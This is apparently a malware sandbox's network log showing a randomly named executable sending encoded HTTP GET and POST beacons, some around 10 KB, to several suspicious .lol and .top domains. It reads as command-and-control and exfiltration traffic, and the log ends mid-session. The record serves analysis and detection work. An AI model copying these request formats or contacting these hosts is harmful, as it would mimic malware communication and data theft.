                  4192.168.2.449740116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:10:44.897965908 CEST496OUTGET /kfqo/?n02X2xPX=NiOdQOuMLD2zHgMWwKws4JzuutDmLpx3tWxYTf2s7ZGupi3Uz5m5Dts89dE7D44P7JMDqAvEJ+8u+Llyo4b9pPx+fjdmUm+qFImntH+EZRPwIZM2dcS4AHM=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1
                  Host: www.binpvae.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.449742207.148.37.252802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:11:28.369642973 CEST750OUTPOST /1kbe/ HTTP/1.1
                  Host: www.a9jcpf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.a9jcpf.top
                  Referer: http://www.a9jcpf.top/1kbe/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 67 62 34 2f 56 4d 6b 59 78 2b 52 65 52 64 78 79 35 47 76 75 32 66 33 6d 59 59 4c 4f 38 67 74 42 6f 5a 4d 71 2b 6e 35 42 4d 73 30 31 6b 68 56 2f 6e 6c 30 45 5a 67 59 55 73 78 6c 6b 78 6e 34 76 53 69 76 64 58 67 78 77 69 49 43 57 76 54 4f 4f 73 67 62 51 6e 36 43 4f 70 63 69 43 75 33 6e 52 78 4a 30 34 36 61 73 4d 51 45 31 6e 68 78 6a 35 49 4f 68 7a 2f 6f 43 4e 44 34 6c 6f 6a 4f 66 63 2b 34 38 34 36 30 4c 78 30 62 4d 44 6b 49 6b 47 76 58 38 6b 75 33 5a 67 75 4f 35 7a 4a 73 59 46 7a 50 56 46 56 65 6f 50 36 58 4c 6a 4a 6a 49 61 4f 32 71 76 43 50 62 30 35 66 39 32 50 34 35 4a 57 77 3d 3d
                  Data Ascii: n02X2xPX=gb4/VMkYx+ReRdxy5Gvu2f3mYYLO8gtBoZMq+n5BMs01khV/nl0EZgYUsxlkxn4vSivdXgxwiICWvTOOsgbQn6COpciCu3nRxJ046asMQE1nhxj5IOhz/oCND4lojOfc+48460Lx0bMDkIkGvX8ku3ZguO5zJsYFzPVFVeoP6XLjJjIaO2qvCPb05f92P45JWw==
                  Jul 4, 2024 03:11:29.378324986 CEST209INHTTP/1.1 530
                  Date: Thu, 04 Jul 2024 01:11:29 GMT
                  Content-Type: text/html;charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Server: cdn
                  Data Raw: 32 64 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 30 37 2e 31 34 38 2e 33 37 2e 32 35 32 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2d207.148.37.252 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.449743207.148.37.252802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:11:30.935622931 CEST770OUTPOST /1kbe/ HTTP/1.1
                  Host: www.a9jcpf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.a9jcpf.top
                  Referer: http://www.a9jcpf.top/1kbe/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 67 62 34 2f 56 4d 6b 59 78 2b 52 65 51 35 31 79 2f 6e 76 75 7a 2f 33 6e 53 34 4c 4f 32 41 74 2f 6f 5a 49 71 2b 6c 55 5a 4d 35 6b 31 6b 42 46 2f 6d 6e 63 45 61 67 59 55 34 68 6c 6c 75 33 35 43 53 69 6a 6a 58 6c 52 77 69 49 2b 57 76 53 2b 4f 73 7a 7a 50 6d 71 43 4d 79 73 69 41 6a 58 6e 52 78 4a 30 34 36 62 4a 5a 51 41 68 6e 69 45 72 35 4c 76 68 77 38 6f 43 4b 54 6f 6c 6f 79 65 66 51 2b 34 38 65 36 77 72 49 30 5a 30 44 6b 4e 59 47 76 47 38 6c 33 48 5a 69 71 4f 34 7a 49 5a 46 4a 38 74 41 47 62 39 73 58 7a 30 6d 65 42 46 5a 41 66 48 4c 34 51 50 2f 48 6b 59 30 43 43 37 45 41 4e 38 4b 63 42 57 54 61 2f 35 46 55 4c 52 4b 4f 55 6f 4a 41 33 67 63 3d
                  Data Ascii: n02X2xPX=gb4/VMkYx+ReQ51y/nvuz/3nS4LO2At/oZIq+lUZM5k1kBF/mncEagYU4hllu35CSijjXlRwiI+WvS+OszzPmqCMysiAjXnRxJ046bJZQAhniEr5Lvhw8oCKToloyefQ+48e6wrI0Z0DkNYGvG8l3HZiqO4zIZFJ8tAGb9sXz0meBFZAfHL4QP/HkY0CC7EAN8KcBWTa/5FULRKOUoJA3gc=
                  Jul 4, 2024 03:11:31.832192898 CEST209INHTTP/1.1 530
                  Date: Thu, 04 Jul 2024 01:11:31 GMT
                  Content-Type: text/html;charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Server: cdn
                  Data Raw: 32 64 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 30 37 2e 31 34 38 2e 33 37 2e 32 35 32 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2d207.148.37.252 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.449744207.148.37.252802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:11:33.477741003 CEST10852OUTPOST /1kbe/ HTTP/1.1
                  Host: www.a9jcpf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.a9jcpf.top
                  Referer: http://www.a9jcpf.top/1kbe/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 67 62 34 2f 56 4d 6b 59 78 2b 52 65 51 35 31 79 2f 6e 76 75 7a 2f 33 6e 53 34 4c 4f 32 41 74 2f 6f 5a 49 71 2b 6c 55 5a 4d 35 73 31 6b 7a 39 2f 67 47 63 45 62 67 59 55 6b 52 6c 65 75 33 34 41 53 69 37 2f 58 6c 56 4b 69 4f 79 57 75 30 4b 4f 39 53 7a 50 76 71 43 4d 74 63 69 42 75 33 6d 4d 78 4a 45 30 36 61 35 5a 51 41 68 6e 69 46 62 35 66 75 68 77 36 6f 43 4e 44 34 6c 30 6a 4f 66 30 2b 34 56 6c 36 77 76 48 7a 70 55 44 6b 74 6f 47 69 51 51 6c 6f 33 5a 73 6e 75 34 64 49 5a 41 4c 38 74 63 73 62 2b 77 74 7a 33 36 65 45 67 46 64 63 6b 6e 79 46 35 79 63 34 35 6f 38 5a 4d 55 31 55 4c 4f 59 43 54 62 7a 70 59 38 35 47 77 37 59 43 71 6c 47 6b 47 76 72 49 74 52 48 39 72 55 4c 74 78 74 70 65 4d 53 47 7a 39 72 45 54 76 2b 73 32 67 69 45 54 35 42 50 54 30 62 46 53 72 51 39 6d 38 65 7a 77 43 63 79 79 58 2b 71 76 63 57 47 6a 30 6d 49 6c 46 74 76 33 2b 78 66 6e 78 2f 4e 6d 50 30 36 6b 56 2f 35 32 51 47 30 4d 66 67 67 6e 68 7a 30 2b 4e 51 30 7a 5a 30 67 5a 69 48 34 76 56 4d 4b 5a 6e 62 4a 65 [TRUNCATED]
                  Data Ascii: n02X2xPX=gb4/VMkYx+ReQ51y/nvuz/3nS4LO2At/oZIq+lUZM5s1kz9/gGcEbgYUkRleu34ASi7/XlVKiOyWu0KO9SzPvqCMtciBu3mMxJE06a5ZQAhniFb5fuhw6oCND4l0jOf0+4Vl6wvHzpUDktoGiQQlo3Zsnu4dIZAL8tcsb+wtz36eEgFdcknyF5yc45o8ZMU1ULOYCTbzpY85Gw7YCqlGkGvrItRH9rULtxtpeMSGz9rETv+s2giET5BPT0bFSrQ9m8ezwCcyyX+qvcWGj0mIlFtv3+xfnx/NmP06kV/52QG0Mfggnhz0+NQ0zZ0gZiH4vVMKZnbJeEOp3iH4RpJuEXp0lv4A1bayKr5m2js5NvfMhUXlAg2OjduifjaxC3UdpndwDtOx2tDAbiDBwCWPrqLM1no8/NSqB3PN/PJjWraXLmsfjvnrxFJWnfGgyUD7fcTpbuKDVWv8pvKsR3C++QteUB0e6eKBcahAtg6Nu3j0ZUg83xxcIYI2WimruVPebeI6+K+IDp6lKFTAfVsUJyjcW02YhgTKMBOCk6X/D4rjduT0SvS4uQNSJml+I+cr8nC6nm3QW1j+bNjUC6l7J8FyttkHOYxvasIhSH/yZLtp1YuGgKAWp+w814M+ce9QMVuQ2x6a/BgwqOSXRbgTBHkPH7Vx+19cMB7C2aJ8+Txi9HpgJLX0Z6kxdQG2yiILhyLGEZ+YfVxgnW5H9A9nEMXvb74eMNVNOlFwoTNQEWvxMkWaXy13VOZ+hUIQl5IWi7Ya3E8QxztRVWV0LEfYRNI0KD1kXft+K5X/5kb8sKOLFtA18JCU8Yt2axIBxAYNbOVq50rVdnroLioApIleyxfIT5KaSdBaosdOO5N/tseDFJwoIkWjpDWaPMStPw7odwoRrDb+J+un2HzWMIYMIIz++fkVfK9sjmDz7znDhqEDkjAwW94pvzDjHUvtFQCghNWK0T0OU1ZcqohjaA0OmJG4JK2p7CGBHDaAyrvMESx [TRUNCATED]
                  Jul 4, 2024 03:11:34.369812965 CEST209INHTTP/1.1 530
                  Date: Thu, 04 Jul 2024 01:11:34 GMT
                  Content-Type: text/html;charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Server: cdn
                  Data Raw: 32 64 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 30 37 2e 31 34 38 2e 33 37 2e 32 35 32 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2d207.148.37.252 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.449745207.148.37.252802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:11:36.007993937 CEST495OUTGET /1kbe/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=tZQfW8UiiNJTf5Fq5WrX9vmmZrioxCoVqMwq5i80b8QJkwpSgFAdETlO4QFSoDRfTxjpMxprnPemrx/P1Sfw5KD2hu+ipHyltaJOhZhwSC5dlgXXfIxM6PM= HTTP/1.1
                  Host: www.a9jcpf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:11:36.905635118 CEST209INHTTP/1.1 530
                  Date: Thu, 04 Jul 2024 01:11:36 GMT
                  Content-Type: text/html;charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Server: cdn
                  Data Raw: 32 64 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 30 37 2e 31 34 38 2e 33 37 2e 32 35 32 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2d207.148.37.252 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.449746116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:11:42.301664114 CEST753OUTPOST /il19/ HTTP/1.1
                  Host: www.mhtnvro.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.mhtnvro.lol
                  Referer: http://www.mhtnvro.lol/il19/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 37 55 63 6f 6b 71 32 45 76 59 32 71 77 68 38 5a 37 46 54 79 43 58 4d 4f 6e 56 7a 4c 6d 63 67 6a 2b 5a 43 69 72 33 6e 48 66 6c 54 6c 50 47 74 34 64 68 67 57 71 5a 42 64 35 34 79 6a 36 52 4f 68 2f 59 58 38 44 46 45 39 62 52 64 50 4e 32 50 77 79 35 6b 55 74 4b 6a 34 2f 71 53 47 7a 70 48 6f 64 42 36 76 71 75 4f 59 4e 49 4e 73 6b 64 48 44 5a 52 32 6b 71 4b 62 49 44 44 56 44 4b 36 67 73 63 77 55 64 61 62 53 6a 53 7a 4c 4a 4e 59 38 4a 65 55 56 65 76 50 4a 30 75 75 77 72 61 49 7a 44 6d 34 4a 68 36 39 4d 79 69 61 55 63 77 75 73 34 77 53 72 38 47 2b 39 32 38 54 33 6d 78 44 78 30 2f 51 3d 3d
                  Data Ascii: n02X2xPX=7Ucokq2EvY2qwh8Z7FTyCXMOnVzLmcgj+ZCir3nHflTlPGt4dhgWqZBd54yj6ROh/YX8DFE9bRdPN2Pwy5kUtKj4/qSGzpHodB6vquOYNINskdHDZR2kqKbIDDVDK6gscwUdabSjSzLJNY8JeUVevPJ0uuwraIzDm4Jh69MyiaUcwus4wSr8G+928T3mxDx0/Q==


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.449747116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:11:44.836771965 CEST773OUTPOST /il19/ HTTP/1.1
                  Host: www.mhtnvro.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.mhtnvro.lol
                  Referer: http://www.mhtnvro.lol/il19/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 37 55 63 6f 6b 71 32 45 76 59 32 71 32 79 55 5a 39 69 50 79 44 33 4d 42 37 6c 7a 4c 2f 4d 67 6e 2b 5a 65 69 72 7a 58 58 66 77 6a 6c 50 6a 4a 34 50 6a 49 57 72 5a 42 64 32 59 79 36 31 78 50 74 2f 59 62 61 44 48 41 39 62 51 35 50 4e 7a 7a 77 31 49 6b 58 72 4b 6a 36 6e 61 53 45 33 70 48 6f 64 42 36 76 71 74 79 32 4e 49 56 73 6b 75 66 44 4c 6a 53 72 78 71 62 4c 4b 6a 56 44 41 71 67 6f 63 77 55 2f 61 61 4f 46 53 32 50 4a 4e 59 73 4a 65 47 74 42 32 2f 4a 32 71 75 78 64 53 70 65 4a 2f 74 39 71 39 39 4d 4b 6c 61 73 74 78 6f 39 69 68 6a 4b 72 55 2b 5a 46 68 55 2b 53 38 41 4d 39 6b 65 38 35 31 4b 6a 46 68 4d 39 76 37 78 6f 50 65 77 6a 55 54 6f 41 3d
                  Data Ascii: n02X2xPX=7Ucokq2EvY2q2yUZ9iPyD3MB7lzL/Mgn+ZeirzXXfwjlPjJ4PjIWrZBd2Yy61xPt/YbaDHA9bQ5PNzzw1IkXrKj6naSE3pHodB6vqty2NIVskufDLjSrxqbLKjVDAqgocwU/aaOFS2PJNYsJeGtB2/J2quxdSpeJ/t9q99MKlastxo9ihjKrU+ZFhU+S8AM9ke851KjFhM9v7xoPewjUToA=


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.449748116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:11:47.385162115 CEST10855OUTPOST /il19/ HTTP/1.1
                  Host: www.mhtnvro.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.mhtnvro.lol
                  Referer: http://www.mhtnvro.lol/il19/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 37 55 63 6f 6b 71 32 45 76 59 32 71 32 79 55 5a 39 69 50 79 44 33 4d 42 37 6c 7a 4c 2f 4d 67 6e 2b 5a 65 69 72 7a 58 58 66 78 33 6c 50 31 56 34 4d 45 55 57 36 70 42 64 2f 34 79 2f 31 78 4f 33 2f 59 7a 47 44 48 4d 4c 62 54 52 50 43 78 4c 77 77 39 45 58 34 71 6a 36 37 71 53 48 7a 70 48 48 64 42 72 6d 71 75 4b 32 4e 49 56 73 6b 6f 62 44 4a 78 32 72 32 61 62 49 44 44 55 52 4b 36 67 41 63 78 78 43 61 62 36 7a 54 46 33 4a 4e 35 63 4a 63 31 56 42 2f 2f 4a 6f 6e 4f 78 56 53 70 53 4b 2f 72 59 54 39 2b 51 73 6c 5a 77 74 7a 4d 70 35 37 51 4f 44 4b 50 78 61 33 6e 4b 4e 39 78 6b 4c 6c 59 63 63 31 49 76 72 35 50 42 66 2b 7a 67 47 49 78 76 6e 51 2f 47 45 7a 63 33 46 35 55 4c 49 4e 57 63 45 50 32 76 66 75 2b 72 66 33 78 6b 32 72 45 52 42 61 6e 77 55 49 4f 30 79 57 77 35 35 66 6a 4c 4f 4f 71 75 66 5a 73 49 50 35 62 6c 35 34 31 35 76 61 6d 6f 56 37 75 76 4a 61 52 65 77 7a 32 48 45 72 6d 34 56 33 69 32 69 6a 38 2b 4e 4e 6b 4a 73 62 42 43 4d 4d 61 4f 6b 62 57 4e 32 45 72 48 50 57 31 73 66 73 [TRUNCATED]
                  Data Ascii: n02X2xPX=7Ucokq2EvY2q2yUZ9iPyD3MB7lzL/Mgn+ZeirzXXfx3lP1V4MEUW6pBd/4y/1xO3/YzGDHMLbTRPCxLww9EX4qj67qSHzpHHdBrmquK2NIVskobDJx2r2abIDDURK6gAcxxCab6zTF3JN5cJc1VB//JonOxVSpSK/rYT9+QslZwtzMp57QODKPxa3nKN9xkLlYcc1Ivr5PBf+zgGIxvnQ/GEzc3F5ULINWcEP2vfu+rf3xk2rERBanwUIO0yWw55fjLOOqufZsIP5bl5415vamoV7uvJaRewz2HErm4V3i2ij8+NNkJsbBCMMaOkbWN2ErHPW1sfsWNEeF0xFgCKL3O5aiETWTeAZRqYs3tCFn2ToJxbiN/3cANMrpQL91gBkkXNv+gLJaSsLut/xdZ3CjcfF/mmD/VZvzh4JcNxbRoapoERLRHG3CXuirGqLRaJeYIQ09TOufDH0ArqOHHZiSl9hlhvfVeXFZijKKgCWpvq559F3gE6zXRY2ERIrmE+za+wn9hUsA9R9js+Xrvf4RSveEGUdqQmf9hORq/q3G/R4BcMOqQ0UiKz9nbKz7QEIQjh035eZ/R7fB1PiswO6TjDZ22xW8I/uR2nFB96Qf/FdpN4d4Gr2LLLnpVZwwY3tIriqj8J+RTWjUgsl4u9/BFwVY0nrzAN/9D/ZxeIytPdEyi7f8SxIAePn7aZoDiydcf/eADxFmB7L8++OoBm1JZsG4JbHPXgLEizkQgVSqP+wHAQcLtdEbHAxqvztt7m7nZzvV0qOxe5VsAJwnQtfWRGoiMGx0SpKk/2HVtqavmVww9TZgu0hFpYW3wg1bXAx+WuIdOUbdbkSTFIXHv3eYDwG6gXw7mLV+O5sX7EhkV2XTiMQ5UfzQtX/Gaz59bxo63stSMrF+XpojWiU9t8POrlFl0Ivk4GVTKMJ0ZLgFtxqdrLkrEm+qaMGrhx+m8SpJgmEwD17y9ihN4WemtApjQwMmMpHm/KBqK+sih+qUJ [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.449749116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:11:49.918725014 CEST496OUTGET /il19/?n02X2xPX=2W0Inf+zka60rkge6x3gGQQeo1iuz6hi+bPXuzv4I1vHSGtqZzoorLZZnoCmwyX2i4rMR0gWWwZYBzao7rAttPu5367SyozTICrQ88OWOZt9joXCP1iWm4I=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1
                  Host: www.mhtnvro.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.449750203.161.55.102802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:12:16.585943937 CEST756OUTPOST /ff8d/ HTTP/1.1
                  Host: www.lexiecos.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.lexiecos.top
                  Referer: http://www.lexiecos.top/ff8d/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 6c 6a 68 6a 33 47 72 6c 73 34 51 6b 6e 6e 52 71 62 57 77 5a 47 70 49 69 39 79 44 51 6c 57 62 56 45 2b 33 4f 7a 44 67 74 44 63 57 72 77 4a 36 47 50 79 63 5a 62 62 41 4d 48 7a 67 6d 47 65 67 77 6c 53 44 47 2f 6d 7a 55 52 70 74 68 6f 64 41 59 66 56 6d 45 4a 59 50 30 38 33 57 57 70 70 78 71 67 32 32 6b 45 57 49 38 2f 73 4c 52 7a 71 4d 2b 6a 42 79 4b 7a 5a 35 76 68 62 49 32 66 7a 39 45 39 4a 57 41 33 49 4f 38 4a 44 37 4f 72 77 37 2b 4e 45 6c 38 52 7a 61 74 2f 78 77 76 68 75 73 49 6c 69 7a 44 31 2f 6f 77 52 35 56 6d 75 70 79 52 72 69 71 32 4a 6c 6e 41 6f 6b 38 51 65 63 79 4d 6e 77 3d 3d
                  Data Ascii: n02X2xPX=ljhj3Grls4QknnRqbWwZGpIi9yDQlWbVE+3OzDgtDcWrwJ6GPycZbbAMHzgmGegwlSDG/mzURpthodAYfVmEJYP083WWppxqg22kEWI8/sLRzqM+jByKzZ5vhbI2fz9E9JWA3IO8JD7Orw7+NEl8Rzat/xwvhusIlizD1/owR5VmupyRriq2JlnAok8QecyMnw==
                  Jul 4, 2024 03:12:17.219511986 CEST533INHTTP/1.1 404 Not Found
                  Date: Thu, 04 Jul 2024 01:12:17 GMT
                  Server: Apache
                  Content-Length: 389
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.449751203.161.55.102802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:12:19.121758938 CEST776OUTPOST /ff8d/ HTTP/1.1
                  Host: www.lexiecos.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.lexiecos.top
                  Referer: http://www.lexiecos.top/ff8d/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
